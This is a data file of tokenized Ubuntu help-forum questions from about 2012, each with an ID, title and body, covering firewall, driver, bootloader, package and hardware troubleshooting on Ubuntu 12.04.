183320	firestarter preventing firefox accessing internet	i have recently had an issue with firestarter preventing firefox accessing the internet . i have used firestarter in the past with hardy heron and recently switched to precise pangolin . the policy settings i used with hardy for firestarter are : outbound traffic policy restrictive by default - whitelist traffic http 80 - everyone https 443 - everyone pop3 110 - everyone smtp 25 - everyone these settings worked fine on hardy and until this past friday worked fine on precise . then i started to get the message server not found when opening firefox . the only way to access the internet is to disable the firewall . in case it 's a hardware issue , i am using a zepto znote 3215w laptop ( wired internet connection ) . am i doing wrong somewhere ? any help greatly appreciated ( i 'm still learning about linux ) .
183328	where are pem files stored for validating ssl certificates ?	i am writing a soap client application on ubuntu using openssl and c++ . i am having trouble getting my code to validate the server certificate even though it is a world famous betting site that i know has a valid certificate . just to make sure i would like to check that it is the case and apparently pem files are used to list valid certificates . can anyone tell me where these files reside on my ubuntu 12.04 installation ? i have the ca-certificates package installed on my machine , so these files must be there somewhere ?
183332	does linux support capturing tcp packets without being super user ?	is it possible to capture packets without superuser ? this is what i see in the wikipedia article : in some unix-like operating systems , a user must have superuser privileges to use tcpdump because the packet capturing mechanisms on those systems require elevated privileges . however , the -z option may be used to drop privileges to a specific unprivileged user after capturing has been set up . in other unix-like operating systems , the packet capturing mechanism can be configured to allow non-privileged users to use it ; if that is done , superuser privileges are not required . http : //en.wikipedia.org/wiki/tcpdump
183335	reduce screen brightness in battery mode automatically	kde and xfce4 has a program to adjust the screen brightness automatically in battery mode to a preset value . how can i set the same with unity ( or gnome3 ) ?
183337	planning to buy laptop , want to install ubuntu on it , any limitations ?	i 'm planning to buy a laptop and want to install ubuntu on it , are there certain hardware types which ubuntu does n't work on ? i 'm really no hardware expert , i assume i wo n't buy anything from apple though because it 's made for os x i believe . i got some recommendations on dell so far but really not decided yet
183339	segmentation fault when trying to run psychonauts . not solved by forcing s3tc-support or getting the needed libraries	so i 'm having problems running psychonauts as i 've noticed many others have as well . i installed it through software center and made sure i had the right libs needed to run mesa ( libtxc-dxtn-s2tc0 : i386 , since i 'm running a 64-bit system ) . i should start by saying i 'm not sure whether it will run smoothly on my notebook anyway . saw something about a missing opengl-extension i 'm not sure what that means but i 'm guessing it 's trouble . but i run a fujitsu siemens amilo sa3650 which comes with an external graphics card so i might be able to make it run smoothly with that later , just have n't configured it yet . so i just want to see if i can make it run at all first . when i try running it by forcing s3tc support with : force_s3tc_enable=true /opt/psychonauts/psychonauts i get this output stubbed : fix up the rest of the sse code first at detectssesupport ( /home/icculus/projects/psychonauts/source/commonlibs/dfmath/mathgeneral.cpp:32 ) stubbed : write me ? at setpclanguage ( /home/icculus/projects/psychonauts/source/game/luatest/unixmain.cpp:120 ) stubbed : fix up the rest of the sse code first at detectcpucaps ( /home/icculus/projects/psychonauts/source/game/luatest/game/pcgameapp.cpp:223 ) stubbed : check lang envr var at _getdefaultgamelanguage ( /home/icculus/projects/psychonauts/source/game/luatest/game/gameapp.cpp:171 ) console created save path : /home/alex/.local/share/psychonauts write path : workresource stubbed : inline asm at ssemul_4x4_4x4_2arg ( /home/icculus/projects/psychonauts/source/commonlibs/dfmath/matrix.cpp:710 ) stubbed : inline asm at ssemul_4x4_4x4_3arg ( /home/icculus/projects/psychonauts/source/commonlibs/dfmath/matrix.cpp:698 ) ******** unit test failed ******** stubbed : vk_* at initinputnames ( /home/icculus/projects/psychonauts/source/commonlibs/directx/sdlinput.cpp:1220 ) no joysticks detected transport started daved : nclistensocket : listening on port 40001 error : missing required opengl extensions : - gl_arb_vertex_buffer_object start up completed in 0.27 seconds segmenteringsfel ( minnesutskrift skapad ) it 's in swedish , so if it 's something you do n't understand ( you can probably guess most thing just from the context it 's in ) you 'll have to ask me and i 'll translate . now , what should i do ? maybe i should add that i did try to install it just by manually downloading and running the bin-file from the humble bundle-website . i did this before trying it through software center . i got the same results . and i tried the s3tc-thing and made sure i hade the right libs after installing by that method as well . any suggestions would be very helpful . ps . love askubuntu ! it has helped me with a lot of problems without me having to post a question before but for this i could n't quite find any question that was about the same problem . edit : i 'm running ubuntu 12.04 64-bit version .
183354	configuring wacom tablet buttons and options	i have a new wacom intuos5 touch medium . surprisingly enough , it worked out of the box when i connected it to my computer ( ubuntu 12.04 32-bit ) , including the pen pressure and some touch pad features . i also managed to change the input for left-handed use , using the gui provided by ubuntu to manage the wacom driver . however , when i entered the button mapping menu to configure the buttons on the tablet itself ( not those on the stylus ) , no matter what i did , the changes i made there had no effect . right now , one of the buttons can only be used as a right-click , another as a middle-click and the button which should change modes for the touch ring as left-click . the touch ring itself does n't seem to do anything , except for some strange flickers in gimp 's coordinates . the other buttons do nothing . i searched a bit and realized that xsetwacom can be used , but i 'm not entirely sure how to use it : how do i see the names of the buttons so that i can assign them functions ? how do i make the touch ring work ? what exactly am i looking for in that command ? also , is there a way to make one of the buttons responsible for turning on/off the touch pad ? and is there a way to configure rotation with fingers , like wacom shows is possible with this tablet ? your answers will be greatly appreciated , i 'm quite at a loss here !
183358	create windows xp 's live usb using ubuntu	my hard disk crashed.. i can run ubuntu using a pendrive by making a live usb of ubuntu , which i made using windows 7 . in the similar way , i want to run windows xp too using another pen drive ( without hard disk ) and i want to make it from ubuntu ( 12.04 ) . the resources i have are ubuntu 's live usb , windows xp and windows 7 installation disk , some blank dvds but no hard drive . i have very basic knowledge of linux . thanks
183361	ubuntu logs to diagnose hardware issues	recently , my laptop has started turning off for no apparent reason ; it 's an old laptop and the problem is likely to be a hardware issue , but i was wondering if there were any ubuntu logs that might shed some light on the issue ?
183364	deleting a file from /dev	i am new to attempting to use the code for everything , and for once i do n't have root permission on my user account as a back up . i was n't focussing while making an iso with genisoimage and created it in the /dev system , which is were i had changed directory to earlier . how do i go about deleting the iso i created from that file system ? thanks in advance for the help . stephen
183372	lirc_zilog ir transmission no longer working with hd-pvr on 12.04	i have been running a ubuntu 10.04 with a patched version of lirc_zilog for two years . i upgraded to 12.04 and lirc_zilog is no longer working with my hd-pvr . the mythtv wiki reports that it did work out of the box with 11.04 . the error message i get on irsend is as follows : johnf @ carbon : ~ $ /usr/local/bin/irsend send_once blaster 0_130_key_power irsend : command failed : send_once blaster 0_130_key_power irsend : hardware does not support sending the lircd daemon , run interactively , reports the following : lircd : accepted new client on /var/run/lirc/lircd lircd : could not get hardware features lircd : this device driver does not support the lirc ioctl interface lircd : major number of /dev/lirc0 is 250 lircd : lirc major number is 61 lircd : check if /dev/lirc0 is a lirc device lircd : warning : failed to initialize hardware lircd : error processing command : send_once blaster 0_130_key_power lircd : hardware does not support sending lircd : removed client checking dmesg seems to indicate that the kernel module is loading properly : [ 56497.730743 ] lirc_zilog : module is from the staging directory , the quality is unknown , you have been warned . [ 56497.730999 ] lirc_zilog : zilog/hauppauge ir driver initializing [ 56497.732484 ] lirc_zilog : ir_probe : ir_rx_z8f0811_hdpvr on i2c-0 ( hauppage hd pvr i2c ) , client addr=0x71 [ 56497.732493 ] lirc_zilog : ir_probe : ir_tx_z8f0811_hdpvr on i2c-0 ( hauppage hd pvr i2c ) , client addr=0x70 [ 56497.732496 ] lirc_zilog : probing ir tx on hauppage hd pvr i2c ( i2c-0 ) [ 56497.756822 ] lirc_zilog : firmware of size 302355 loaded [ 56497.756945 ] lirc_zilog : 743 ir blaster codesets loaded [ 56497.757030 ] i2c i2c-0 : lirc_dev : driver lirc_zilog registered at minor = 0 [ 56497.757033 ] lirc_zilog : ir unit on hauppage hd pvr i2c ( i2c-0 ) registered as lirc0 and ready [ 56497.757035 ] lirc_zilog : probe of ir tx on hauppage hd pvr i2c ( i2c-0 ) done [ 56497.757056 ] lirc_zilog : initialization complete here is my /etc/lirc/hardware.conf # chosen ir transmitter transmitter= '' hd-pvr '' transmitter_modules= '' lirc_dev lirc_zilog '' transmitter_driver= '' '' transmitter_device= '' /dev/lirc0 '' transmitter_socket= '' '' transmitter_lircd_conf= '' '' transmitter_lircd_args= '' '' my lircd.conf is a copy of the recommended one . examination of the kernel source seems to indicate that the lirc_zilog module should support transmission , it 's newer than the patched version i was manually compiling on 10.04 . i was previously using a manually built version of lirc 0.8.7 and not the packaged one . i 'm now running the packaged version 9.0 . i can provide any additional information required and will perform tests quickly . i 'm very eager to get this issue resolved .
183377	source or dot operator overriding execute permission ?	if i have turned off execute permissions on hello.sh and try to execute it ~ $ sudo chmod 0666 hello.sh ~ $ ./hello.sh -bash : ./hello.sh : permission denied i get the permission error . but i can easily override that by using the . or source builtin . $ . hello.sh hello everyone what 's the purpose of setting the execute permission on a file if someone can override it using the source builtin ? hello.sh # ! /bin/bash echo 'hello everyone'
183380	ubuntu download with wget and parameters	i tied to download a .torrent file via wget but it do n't work . i tried it with wget `` http : //abc/ ? page=download & tid=348168 '' -o test.torrent and also wget `` http : //abc/index.php ? page=download & tid=348168 '' -o test.torrent but it downloads only a file named index.php ? page=download & tid=348168 and rename it to test.torrent . how can i get the torrent file ?
183386	nouveau driver issue when trying to boot ubuntu	i just installed ubuntu , and it says nouveau failed to idle channel 1 and 2. it also says nouveau playlist update failed . i believe this is a video card driver problem . what can i to to resolve this ? other info intel i5 2500k evga nvidia geforce gtx 560 se dual booting with windows 7 professional used wubi to install i took a photo of the command line text which i can upload if needed
183390	ca n't control pianobar after using echo	i have a script that starts pianobar ( pandora player ) and autoloads into tty2 after booting . i 'm running ubuntu precise 12.04. it 's a pretty simple script : # ! bin/bash sleep 5 echo `` 2 '' | pianobar this works , it selects station 2 and begins playing ... but when i try to type in commands it does n't work ( like pushing `` p '' for pause . ) it 'll show the letter for a second , then hide it . if i try to exit with ctrl+z it just sits there and i ca n't use it at all . if i run this it works fine but does n't auto-select the second station : # ! bin/bash sleep 5 pianobar is there anyway to write this so it will automatically input `` 2 '' and then allow me to control from there ? or am i stuck with having to select 2 every time i boot up ? edit : i modified it to this : # ! bin/bash sleep 5 { echo 2 ; cat ; } | pianobar and it does the exact same thing as just `` echo 2 | pianobar '' '' is n't there an option to pianobar to start with a default station '' i would of thought so , but i ca n't find a command for a default setting when i do `` man pianobar '' when i open the program , it does a login and then the program starts with `` select station : '' i 'd like for it to automatically go into the 2nd station .
183396	gui for ubuntu server	i 'd like to do some work with ubuntu server software . i 'm familiar with ubuntu linux and have a fair bit of experience with networking and server technology , but i 'm not strong on the linux command-line . i tried to install the latest version of ubuntu server , but it was just a command line . is there a gui version of ubuntu server or and easy way to install one from the command line ? tia
183397	how do i source a shell script for node version manager ?	hi and thanks for looking ! i am new to linux/ubuntu , but i have set up an ubuntu box on which to run node.js . i have had moderate success , but now i need to be able to easily upgrade my version of node . many folks recommend using node version manager . i followed the directions , but when i try to do something like this : nvm ls i get a messaging stating that no command nvm found i have gone back to check the steps i followed to install nvm , but there is one part that is tricky for may and i think to be the culprit : sourcing the file for bash . from the instructions : to activate nvm , you need to source it from your bash shell . ~/nvm/nvm.sh i always add this line to my ~/.bashrc or ~/.profile file to have it automatically sources upon login . often i also put in a line to use a specific version of node . so which file should i add this to ? i am guessing profile since it 's ubuntu ? also , where in the file do i add this line ? after i have added this line , do i need to reboot or anything ? any help would be deeply appreciated -- especially if you can show me an example profile file with . ~/nvm/nvm.sh integrated so that i can see usage . thanks , matt
183402	how to convert free space to a ntfs partition	i have xp on my first hard drive and i installed ubuntu 12.04 onto a second hard drive drive . i left some unallocated space on that second drive that i would like to convert to a ntfs partition . using g parted would i just select the unallocated space and convert it to a primary partition ?
183403	wireless hard switch is enabled , can i turn it off with a command ?	rfkill list shows that the hard switch is on . my keyboard is broken and ca n't use fn + f5 to turn it off.i have been using an external keyboard to use my laptop . i have tried using rfkill to turn it off but that only works with soft switches . any suggestion s ?
183411	having issues using fdisk and gparted with lexar 64gb usb , but reading and writing is fine	i have recently bought a new 64gb lexar usb with the long model name of ljdv10-64g-000-106 , and i am having issues partitioning it . i am able to mount , read and write to the usb without any issues but whenever i try to partition it with gparted it does n't show up in the dropdown . also while using the command sudo fdisk -l i receive the error fdisk : unable to seek on /dev/sdc : invalid argument . this is a brand new usb so i am not sure why i am having these issues , especially since the device is functioning perfectly with read/write . i have tried reformatting it on a windows machine but that does not seem to do anything . for those who want a visual my usb looks almost exactly like but 64gb rather than 8gb edit : i have just ran gparted from the terminal and i am getting a similar error , but it may give more information on the issue . could not determine physical sector size for /dev/sdc . using the logical sector size ( 512 ) . invalid argument during seek for read on /dev/sdc also clearing my usb with /dev/zero fails with the the message $ sudo dd if=/dev/zero of=/dev/sdc bs=1m dd : writing `/dev/sdc ' : no space left on device 1+0 records in 0+0 records out 0 bytes ( 0 b ) copied , 0.00167254 s , 0.0 kb/s
183413	unknown folder on system root /.rpmdb	can somebody explain what the /.rpmdb folder in the root directory is for ? which application creates it and is using it ?
183416	where to install boot loader on a zenbook prime ?	i can not figure out where to install the boot loader on my zenbook ux31a prime . i have installed ubuntu many times on normal hard drives , but this is the first ssd and i am struggling . installed ubuntu 12.04 64-bit selecting `` uefi : general '' boot entry . installation type : something else created partition /sda5 mount as / , /sda6 mount as /home , /sda7 mount as swap selected /dev/sda for boot loader installation . other options are /dev/sda , /dev/sda1/dev/sda3 windows 7 ( loader ) ... grub comes up with 6 entries ubuntu - this runs great linux 3.2.0-29-generic recovery mode : mode hangs with `` fb : conflicting fb hw usae interdrnfb vs efi vga - removing generic adapter '' memtest86 : erro : unknown command `linux 16' memtest86 serial : unknown command `linux 16' windows 7 ( loader ) ( on /dev/sda3 ) : invalid efi file path windows recovery environment ( on /dev/sda8 ) : unknown command drivemap , invalid efi file path . my workaround for booting windows 7 is hitting esc during boot , windows boot manager comes up and * for booting into windows 7 i select `` windows boot manager ( po : sandisk ... . '' . * for booting into ubuntu i select ubuntu ( p0 : sandisk ... ) how can i boot into windows from grub ?
183421	how to set selinux ?	i installed selinux first , i set selinux=enforcing instead of its original value , selinux=permissive in /etc/selinux/config , then i reboot my computer . i waited for some time , but it stopped , i rebooted again and it can not go into the system anymore so i restored the setting . i tried to run seinfo command in a terminal , but it output some errors below : error : policydb version 26 does not match my version range 15-24 error : unable to open policy /etc/selinux/ubuntu/policy/policy.26 . error : input/output error it seems that there is a little difference on how to start up selinux between centos and ubuntu , can you help me configure selinux in ubuntu ?
183425	will the upcoming `` gnomebuntu '' be an official variant ?	i have heard some things about gnomebuntu which is to be a new ubuntu variant , although that may not be its final name . there is an article at world of gnome , which describes it as a community developed variant ( much like xubuntu ) , but will it be classed as an official variant like xubuntu ? i wonder if anyone else had any more information on the project ? thanks izx , we might as well leave the question open so people can add more information as the project develops .
183427	python-minimal dependency jam in lts upgrade from lucid to precise	relatively far along in the lts upgrade with a call to `` apt-get distupgrade '' there appeared : e : could not perform immediate configuration on python-minimal i tried installing python2.7-minimal . this generates the message : dpkg : dependency problems prevent configuration of python2.7-minimal : python2.7-minimal depends on python-minimal ( > = 2.6.6-3+squeeze1 ) ; however : version of python-minimal on system is 2.6.5-0ubuntu1 . dpkg : error processing python2.7-minimal ( -- configure ) : no doubt this is one of the challenges presented by the concept of an lts upgrade . is it safe to use force to replace python2.6-minimal with python2.7-minimal , and , if so , will it take care of the first error ? any clues ?
183429	setting mailto= '' '' for cron in ubuntu	i have tried setting mailto= '' '' under /etc/crontab and /etc/default/cron , but i still receive mail notifications from cron . is there a single place to disable all mail from cron , as opposed to per-task output redirection ? thanks !
183430	tweaking smplayer for quality over performance	hi i do n't know a lot about video players or codecs and that sort of thing , and i am trying to squeeze the best possible quality picture out of mplayer ( i am using the smplayer front end ) . my questions are should i enable post prossesing ( i dont know what this is but it looks like it might improve quality ) and direct rendering ? ( also sounds like it could increase quality ) can any one explain what these do ? . as for output driver i use vdpau is this best for nvidia cards ? any other suggestions welcome . thanks .
183431	`` the system is running in low-graphics mode '' when trying to upgrade to 12.04.1	i have been using ubuntu for a few years and have been very happy with it . i am not very knowledgeable about computers and software stuff . after i clicked on the upgrade to ubuntu 12.04.1 , it downloaded the program and when i went to restart the computer to finish the process it restarted . i received a message stating the system is running in low graphics mode . your screen , graphics card and input device setting could not be detected correctly you will need to correct this yourself . how do i do this ? please give very simple instructions in non technical language . i have an acer computer and samsung monitor .
183440	what changed with timidity , alsa and jack in 11.10 ?	i ( just ) upgraded from 11.4 to 11.10 and noticed some differences in the behavior of timidity . i used to ( 11.4 ) exectute > timidity midifile.midi without running jackd , and thus using alsa ( or pulseaudio ? ) to produce sound from midi files . now having upgraded , this does not work -- currently this command just freezes if jack is not running . if jack is running , it does work but there is an initial audio glitch ( noise burst at the start of playback , analogous to the sound of a plug being inserted ) that i 'd rather not have to deal with . all the indications that i have is that in 11.10 timidity will only work ( albeit glitchy ) with jack on , whereas in 11.4 it did not require this . is there any way to restore timidity 's non-jack operation in 11.10 ? is there a way to get rid of the audio glitch in with jack operation ? overall , what underlying changes in these programs and the audio infrastructure are behind this ?
183441	restoring grub after kubuntu installation	i installed kubuntu on top of my existing ubuntu 12.04 ( 64 bit ) installation . during kubuntu installation , i chose lightdm as my default display manager ( instead of kdm ) . now after rebooting , the grub has a new color ( gray instead of default purplish ) and the screen while booting is gray ( instead of purplish ) . i am curious if it is possible to change this grub behavior without removing kubuntu . i did find a lot of discussion about modifying grub themes but they were not very useful because i do not know what is the default unity grub theme . i did reinstall grub but it did n't change anything . i tried the grub customizer but could n't succeed . thanks in advance !
183443	i am trying to set up a ubuntu sever 12.04 on my machine	i am trying to set up a server on my home network which will eventually host rails . i am not great in linux server and i try to follow the prompt . i did succesfully get to a black screen which then prompts me to a username then password to then do anything ( assuming ) . however here what i try to do i kinda fellow his tutorial http : //www.ubuntugeek.com/step-by-step-ubuntu-11-04-natty-lamp-server-setup.html but however the command where not 100 % like him not in same order but same idea . then i want to install ubuntu server with gui here the command i try with sudo apt-get upgrade sudo apt-get install ubuntu-desktop which however give me the following error err http ... inrelease w failed to fetch ht ... so been ignored if i try the desktop one i get e : unable to locate package ubuntu e : unable to locate package desktop so i am assuming i am not connected to the internet , so i try the following command sudo vi /etc/network/interfaces here the output it gives me and i know my gateway on my laptop is 192.168.1.1 address : 192.168.1.148 netmask : 255.255.255.0 network : 192.168.1.0 broadcasts : 192.168.1.255 gateway : 192.168.1.1 btw i do not know the command to get out of vi and saving it . err http : //us.archive.ubuntu.com precises inrelease err http : //us.archive.ubuntu.com precises-updates inrelease err http : //us.archive.ubuntu.com precises-backports inrelease reading package lists ... done w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/inrelease w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/inrelease w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backport/inrelease
183445	what precautions should i take when moving a hard drive from one computer to another ?	i 'm planning to move a hard drive from one server machine to another . the hard drive is an ide drive . the motherboards are different , as are the memory and such . in this instance , graphics is n't a problem because this is just ubuntu server . are there any precautions i should take , or steps i can do beforehand , in order to make this go as smoothly as possible ? i 've of course already backed up /home directories and configurations in /etc and /var .
183447	12.04 backlight issue for acer aspire 5734z-4725 running on usb flash drive	i have followed the fix found here : backlight issue however i ca n't use the sudo update-grub2 command as it errors with /usr/sbin/grub-probe : error : can not find a device for / ( is /dev mounted ? ) as this laptop 's hard drive is shot , i ca n't install the os . so i 'm using a live usb & i have been able to get it to temporarily work in terminal with sudo setpci -s 00:02.0 f4.b=00 i 'm new to ubuntu , so if you know how to fix this please provide as much detail to what i would need to do .
183455	which driver for ati radeon 9600 all-in-wonder	i 'm very new to ubuntu and linux for that matter , and wondering if anyone there found proper drivers for ati radeon 9600 all-in-wonder . the system ( ubuntu 12.04 ) does n't let me change screes resolution and it 's not recognizing the card . i found this page that shows some info but i 'm really confused where to start and if it 's possible at all to make everything work . any help would be really appreciated .
183457	udf partition reported full when it is not	i was using these instructions to setup an external hard disk with udf . i have been able to setup a multi-partition system using those instructions , but i seem to have hit a wall , where the partition is reported as full while writing to the disk . every other tool available to me reports it as free . relevant lshw output here 's a screenshot showing the disk : both the output of df and the file manager ( caja ) report the disk as free . filesystem size used avail use % mounted on /dev/sda9 9.0g 7.6g 910m 90 % / udev 974m 12k 974m 1 % /dev /dev/sda1 50g 47g 295m 100 % /media/data /dev/sda6 49g 41g 5.9g 88 % /home /dev/sda2 155g 127g 29g 82 % /media/entertainment /dev/sda8 14g 13g 516m 96 % /media/stuff /dev/sdb2 120g 1.9g 112g 2 % /media/3c887659-5676-4946-875b-b797be508ce7 /dev/sdb3 11g 2.6g 7.7g 25 % /media/108b0a1d-fd1a-4f38-b1c6-4ad1a20e34a3 /dev/sdb1 802g 34g 768g 5 % /media/disk i seem to have hit a wall near the 35gb mark . despite being shown as 35gb/860gb used everywhere , the following happens on a write attempt : [ 2017 ] [ /media/dory ] $ echo d > > echo bash : echo : write error : no space left on device writing byte by byte , the maximum i can take it to is 34719248k . the most weird part is that on mounting it windows , windows can write to the disk easily , and the writes are being read fine back in ubuntu . however , the used-bytes remains at 34719248k in ubuntu ( it goes higher on windows , however ) .
183459	potential security problem of passwords and key	is this a potential security problem for ubuntu ? i can access the `` passwords and key '' function without key in password .
183461	why are the proposed badsig ( on apt-get update ) fixes secure ?	i 'm running apt-get update , and i see errors like w : gpg error : http : //us.archive.ubuntu.com precise release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > it 's not hard to find instructions on how to fix these problems , for instance by asking for the new keys with apt-key adv -- recv-keys or rebuilding the cache ; so i 'm not asking about how to fix these . but why is this the right thing to do ? why is `` oh , i need new keys ? cool , go get new keys '' not just defeating the purpose of having a signed repository in the first place ? are the keys signed by a master key that apt-key checks ? should we be doing some additional validation to ensure that we 're getting legitimate keys ?
183482	getting files to/from android phone	i am having trouble to access the filesystem on my phone ( it 's a samsung / google galaxy nexus ) . it just worked in previous version of ubuntu , but now it appears empty whether it is mounted with mtp or ptp . i have followed a few guides on building and reinstalling libmtp etc without success . this answer did not help for me , either , and gmtp just hangs when i click the connect button . i know i can use wifi e.g . airdroid to access my photos , but this is too slow and a bit clumsy for me , and downloaded photos lose their original timestamps . has anyone had success connecting to this phone on 12.04 ? ?
183485	how to make suspend and hibernate work on macbookpro 5,4 ?	a several months ago i got a macbokpro and was glad to find out a clear documentation for installing ubuntu on it . installing ubuntu was easy , but the suspend and hibernate options are not working and i can find a solution for it . it is a real problem for me as the sleep/suspend functionality is a feature i use many times along the day . i tried this ( editing /usr/lib/pm-utils/defaults ) but still after suspending and waking up the screen is just a black and white lines . the only thing i can do to solve the problem is to restart the x-server . is there any solution to this problem ?
183487	how do i use the fonts used in ubuntu in lubuntu ?	i had installed ubuntu for years on my laptop , but on new machine i decided to install lubuntu because i have been unsatisfied with unity . everything looks cool , but fonts now look really ugly with annoying rainbow effect . so , anybody knows how to make fonts look as beautiful as in original ubuntu ? maybe install extra package or something .
183489	how to install udt on ubuntu server 12.04	i want to install udt on my server , normally ( on desktop version ) i just copy a udt folder into ( /usr ) directory but i want a different way of installing it on the server version .
183496	replacement for picasa	i use picasa not because it is a great photo manager -- it 's not , the manager is `` sort of ok '' for my taste . however , it combines a passable photo manager with a good `` quick and dirty '' image editor . it has the basic functions like cropping , resizing , contrast and color adjustment , and the one great feature -- `` i 'm feeling lucky '' button , that works in 90 % of the cases . also , from time to time , i use one or two of the effects ( like saturation or sharpening ) . gimp is great and i use it on a regular basis , but in most cases i just want to go quickly through the photographs of my kids birthday and make them more presentable without much fuss . i 'm looking for a native , open source replacement , something that would not miss the editing capabilities of picasa and would allow me to quickly go through a collection of photographs and make basic edits . a function similar to `` i 'm feeling lucky '' ( automatic adjustment of contrast , color and brightness ) would be most welcome . edit : yes , i have already tried a number of alternatives , if it is necessary i can produce a detailed list here , along with the problems i found . i 'm posting that question because i hope to see a new name .
183500	missing gem 'cgi ( > = 0 ) ruby '	everything was working , but today i get this error : could not find gem 'cgi ( > = 0 ) ruby ' in the gems available on this machine . i have ruby1.9.1-dev installed .
183505	how do i open `` apt '' links in firefox on lubuntu ?	many answers on ask ubuntu direct to links like this that in xubuntu opened in ubuntu software center . in lubuntu i get this error message : in firefox-preferences/applications can not see something resembling to apt to associate to a program etc . opening the same link in chromium or opera i get : clicking `` i 'm running ubuntu '' results in an error message like in firefox . what 's the remedy ? can i install ubuntu software center ?
183507	can not install libreoffice	what is wrong with ubuntu repositories ? sudo apt-get install libreoffice reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libreoffice : depends : libreoffice-core ( = 1:3.5.4-0ubuntu1.1 ) but it is not going to be installed depends : libreoffice-writer but it is not going to be installed depends : libreoffice-calc but it is not going to be installed depends : libreoffice-impress but it is not going to be installed depends : libreoffice-draw but it is not going to be installed depends : libreoffice-math but it is not going to be installed depends : libreoffice-base but it is not going to be installed depends : libreoffice-filter-mobiledev but it is not going to be installed depends : libreoffice-java-common ( > = 1:3.5.4~ ) but it is not going to be installed recommends : libreoffice-gnome but it is not going to be installed or libreoffice-kde but it is not going to be installed e : unable to correct problems , you have held broken packages . solution is to force version of the package libexttextcat-data to 3.2.0-1ubuntu1 ( not to 3.3.1-2~precise1 by default ) . when i tried to upgrade on version 3.3.1-2~precise1 whole libreoffice is marked to remove .
183508	lubuntu : apt-get gives errors such as `` keysafe : package not found '' ?	when i install a program in terminal with apt-get or apt-fast i get messages like these : keysafe : package not found genesis : package not found xdx : package not found omaque : package not found live-magic : package not found wesnoth-1.8 : package not found galan : package not found qgis : package not found pino : package not found easydiff.app : package not found scenic : package not found mined : package not found jlgui : package not found seamonkey : package not found gmameui : package not found qtodo : package not found aee : package not found gtkwhiteboard : package not found pouetchess : package not found streamtuner : package not found jcgui : package not found the installation is otherwise ok , but is this a problem ?
183510	how to disable low disk space notification ?	i 've got an ssd drive for root and /home , and a larger hdd for storage . the storage disk is almost full , and there 's a low disk space warning on startup . the warning does n't have any `` do n't show again '' option , only `` ignore '' and `` examine '' . it also does n't go away but sticks on the screen until the ignore button is clicked , so it 's very annoying in addition to being competely unnecessary . i tried unselecting the storage hdd in baobab 's settings , but that did n't have any effect . i also tried gconf-editor , and looked for apps - > gnome_settings_daemon - > plugins - > housekeeping , but there is no `` plugins '' under `` gnome_settings_daemon '' . only `` gtk-modules '' and `` keybindings '' .
183515	how do i find the kernel version , ubuntu release and disk partition information from the terminal ?	which commands will give me information about following ? kernel version distribution version no . all partition size of the hdd in terminal
183516	how do i detect when my system wakes up from suspend via dbus or similar in a python app ?	in a background python script i need to detect , when the system just woke up from suspend . what is a good way that does not rely on a root script but rather on python modules such as dbus ? i 'm new to dbus so i could really use some example code . from what i read it 's related to org.freedesktop.upower /org/freedesktop/upower org.freedesktop.upower.resuming can anyone help me out with some code that connects the resuming signal to callback ?
183517	can i use other than ubuntu software center to open apt links ?	without ubuntu software center in lubuntu i was unable to edit opening apt links in any program in firefox ( see this question ) after installing ubuntu software center , that problem is solved , but could i use other program instead of ubuntu software center for the same purpose ? i find it too heavy , and to install i prefer the terminal , gdebi , lubuntu software center or the synaptic . ( now that i have the apt option in firefox/preferences/applications , i try to change ubuntu software center to lubuntu software center but this does not change the option . )
183522	how launch vaio sony t13 in uefi mode ?	how to launch vaio sony t13 ( ivy bridge - july 2012 ) in uefi mode to install 12.04.1 ? i tried long press f11 , but does n't work . how to boot into live usb/cd with uefi on latest vaio s series ?
183524	log user activity for the last 24 hours by terminal	how can i log the activity of users for the last 24 hours by terminal in a system ? which command will give me this information ?
183525	how to set wifi driver settings to prefer 5 ghz channel above 2.4 ghz	currently i 'm in a new building of my university . in this building my wifi often breaks down and then restores connection again . this is really irritating since it happens a lot . now as a coincidence there were some tech guys running around here and where asking everyone if the wifi was doing fine . i told them that my wifi tears down all the time and then reconnects . they figured out that my wifi is switching all the time between the 2.4 ghz channel and 5 ghz channel . they asked me if i could acces the driver settings of my wireless card . unfortunately i do n't know how to do this is in either linux or windows . and unfortunately again they only knew the windows solution xd . so i hope somebody can tell me how i tell my wifi that it should stay on the 5 ghz network and not disconnect and switch to the 2.4 ghz channel ? -edit- @ arhimed , firstly thank you for your help . i just tried what you said . it is some what different for me . i ca n't seem to save the settings when i change the setting and choose to use only the 5 ghz band . `` network connections '' - > '' select the appropriate wireless network and click edit '' - > '' in the wireless tab '' - > '' change the mode from infrastructure to ad-hoc '' - > '' choose 5 ghz band '' however when i want to change the mode from infrastructure to ad-hoc the `` save '' button tells me that i have to authenticate myself . however i get no pop-up asking me for a password . using sudo gnome-control-center did n't help either . i could still not save it . also a error occured then in the terminal : ** ( nm-connection-editor:5577 ) : warning ** : invalid setting wireless security : security not compatible with ad-hoc mode hopefully this is some usefull info for you to help me further . -- edit 2012/09/07 -- still no answer ... anyone ?
183527	`` a error occurred during the signature verification . '' during apt-get update	i just did a fresh installation of ubuntu 10.04lts server without any issues . however , the apt-get update or aptitude update is giving the following errors : a. bzip2 : ( stdin ) is not bzip2 file.ign for all lines plus the following errors : fetched 3,582b in 0s ( 74.1kb/s ) reading package lists ... w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used.gpg error : //security.ubuntu.com lucid-security release : the following signatures were invalid : nodata 1 nodata 2 w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used.gpg error : //in.archive.ubuntu.com lucid release : the following signatures were invalid : nodata 1 nodata 2 w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used.gpg error : in.archive.ubuntu.com lucid-updates release : the following signatures were invalid : nodata 1 nodata 2 w : failed to fetch security.ubuntu.com/ubuntu/dists/lucid-security/release w : failed to fetch in.archive.ubuntu.com/ubuntu/dists/lucid/release w : failed to fetch in.archive.ubuntu.com/ubuntu/dists/lucid-updates/release w : some index files failed to download , they have been ignored , or old ones used instead . please guide in resolving this error .
